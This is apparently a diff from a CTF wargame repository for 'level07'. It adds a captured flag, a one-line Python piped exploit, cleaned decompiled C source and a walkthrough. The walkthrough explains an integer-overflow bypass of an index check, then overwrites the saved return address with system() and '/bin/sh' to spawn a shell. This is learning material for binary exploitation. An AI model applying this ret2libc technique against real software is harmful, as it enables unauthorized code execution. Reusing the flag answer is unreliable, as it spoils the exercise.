level07: done

level07/flag

@@ -0,0 +1 @@
+7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC

level07/ressources/exploit

@@ -0,0 +1 @@
+(python -c 'print "store\n" + "4159090384\n" "1073741938\n" + "store\n" + "4160264172\n" + "116\n" + "quit\n"'; cat) | ./level07

level07/source.c

@@ -35,10 +35,9 @@ int store_number(char *data)
 		puts("   This index is reserved for wil!");
 		puts(" *** ERROR! ***");
 		return 1;
-	} else {
-		data[4 * index] = number;
-		return 0;
 	}
+	data[4 * index] = number;
+	return 0;
 }
 
 int read_number(char *data)
@@ -47,18 +46,18 @@ int read_number(char *data)
 
 	printf(" Index: ");
 	unum = get_unum();
-	printf(" Number at data[%u] is %u\n", unum, data[4 * unum]);
+	printf(" Number at data[%u] is %c\n", unum, data[4 * unum]);
 	return 0;
 }
 
 int main(int argc, const char **argv, const char **envp)
 {
-	char data[400];
+	char data[400]; // 0xffffda74
 	int number;
 	char s[4];
 	int a = 0, b = 0, c = 0, d = 0;
 
-	s[0] = 0;
+	s[0] = '\0';
 	memset(data, 0, sizeof(data));
 	while (*argv) {
 		memset((void *)*argv, 0, strlen(*argv));
@@ -93,7 +92,7 @@ int main(int argc, const char **argv, const char **envp)
 			printf(" Failed to do %s command\n", s);
 		else
 			printf(" Completed %s command successfully\n", s);
-		s[0] = 0;
+		s[0] = '\0';
 		a = 0;
 		b = 0;
 		c = 0;

level07/walkthrough

@@ -0,0 +1,24 @@
+# Level07
+
+Using hexrays, we can decompile the code and see a fascist code.
+Basically it has 2 functions, `store_number()` and `read_number()` that writes or reads data to a 400 bytes buffer directly through the index.
+The issue here is that there's no protection on the write to the buffer (except `index % 3`).
+Since the buffer is on the stack, we could overwrite `eip` and replace it by whatever we want.
+First, we will need to determine `eip`'s offset to the buffer. To achieve this, let's use `gdb`.
+We want to break before a call to `store_number` for example (since it has only one argument, `data` buffer will be in `eax`). We then print both the registers and the stack frame (`info registers` and `info frame`).
+We get the adresses of `eip` and `eax` now let's get the offset. Simply substract both addresses: `0xffffdc3c - 0xffffda74 = 456`.
+So, at data[456] we have `eip`.
+We still have 2 issues with this. The first is that the index we input is multiplied by 4 so we have to input `456/4 = 114`, so the real offset is 114.
+But remember the program prevents us from writing to `index % 3 == 0`.
+If we input a large number (e.g. `1e20`) into `read_number()`, we see that it is truncated to `MAX_UINT`.
+We could probably use this to overflow and still print at index 114.
+Let's find the value to overflow to to get 114:
+`(MAX_UINT + 1) / 4 + 114`
+Which is the overflow value for the input index (write to data[index * 4]) + 114. Once we have that, it's almost done.
+All we have left to do is replace `eip` by a call to `system("/bin/sh")`.
+Using gdb, we find both addresses (refer to level04 for the exact process).
+Here, `system == 0xf7e6aed0` and `"/bin/sh" == 0xf7f897ec`.
+We want to put `0xf7e6aed0` in `eip` and `0xf7f897ec` at `eip + 8` (which is eip's index + 2 in `data` since it's multiplied by 4).
+
+Here is the final exploit:
+`(python -c 'print "store\n" + "4159090384\n" "1073741938\n" + "store\n" + "4160264172\n" + "116\n" + "quit\n"'; cat) | ./level07`